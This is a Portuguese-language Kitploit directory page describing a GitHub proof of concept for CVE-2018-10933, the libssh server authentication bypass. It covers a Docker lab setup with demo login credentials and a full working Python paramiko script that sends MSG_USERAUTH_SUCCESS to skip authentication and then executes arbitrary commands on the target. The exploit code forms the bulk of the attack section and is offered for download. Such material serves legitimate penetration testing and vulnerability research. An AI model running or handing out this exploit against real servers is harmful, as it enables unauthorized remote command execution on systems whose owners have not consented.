Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
Libssh-server-CVE-2018-10933 — Exploração de prova de conceito para CVE-2018-10933, demonstrando bypass de autenticação SSH via injeção de MSG_USERAUTH_SUCCESS. Inclui configuração Docker e script Python para execução remota de comandos. | Kitploit
Ferramentas/GitHubGitHub/cyberharsh/libssh-server-cve-2018-10933
Análise de VulnerabilidadesExploraçãoSegurança de RedeTestes de PenetraçãoAutenticaçãoExploração de Binários
GitHubcyberharsh/libssh-server-cve-2018-10933

Libssh-server-CVE-2018-10933

Exploração de prova de conceito para CVE-2018-10933, demonstrando bypass de autenticação SSH via injeção de MSG_USERAUTH_SUCCESS. Inclui configuração Docker e script Python para execução remota de comandos.

Ver Repositório
1há 6 anosAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

Vulnerabilidade de Bypass de Autenticação no libssh (CVE-2018-10933)

中文版本(Chinese version)

libssh é uma biblioteca C multiplataforma que implementa o protocolo SSHv2 nos lados cliente e servidor. Uma vulnerabilidade lógica foi encontrada na máquina de estados do lado servidor do libssh. O atacante pode enviar a mensagem MSG_USERAUTH_SUCCESS antes que a autenticação seja bem-sucedida. Isso pode contornar a autenticação e acessar o servidor SSH alvo.

Referências:

  • https://www.libssh.org/security/advisories/CVE-2018-10933.txt
  • https://www.seebug.org/vuldb/ssvid-97614

Configuração

Inicie o ambiente:

root@kitploit:~
docker-compose up -d

Após o ambiente ser iniciado, podemos conectar na porta your-ip:2222 (conta/senha: myuser:mypassword), que é um login ssh legítimo:

Exploração

Referindo-se ao POC fornecido em https://www.seebug.org/vuldb/ssvid-97614, podemos usar o seguinte script para provar a vulnerabilidade.

root@kitploit:~
#!/usr/bin/env python3
import sys
import paramiko
import socket
import logging

logging.basicConfig(stream=sys.stdout, level=logging.DEBUG)
bufsize = 2048


def execute(hostname, port, command):
    sock = socket.socket()
    try:
        sock.connect((hostname, int(port)))

        message = paramiko.message.Message()
        transport = paramiko.transport.Transport(sock)
        transport.start_client()

        message.add_byte(paramiko.common.cMSG_USERAUTH_SUCCESS)
        transport._send_message(message)

        client = transport.open_session(timeout=10)
        client.exec_command(command)

        # stdin = client.makefile("wb", bufsize)
        stdout = client.makefile("rb", bufsize)
        stderr = client.makefile_stderr("rb", bufsize)

        output = stdout.read()
        error = stderr.read()

        stdout.close()
        stderr.close()

        return (output+error).decode()
    except paramiko.SSHException as e:
        logging.exception(e)
        logging.debug("TCPForwarding disabled on remote server can't connect. Not Vulnerable")
    except socket.error:
        logging.debug("Unable to connect.")

    return None


if __name__ == '__main__':
    print(execute(sys.argv[1], sys.argv[2], sys.argv[3]))

Você pode executar comandos arbitrários no servidor alvo da seguinte forma:

Baixar ferramenta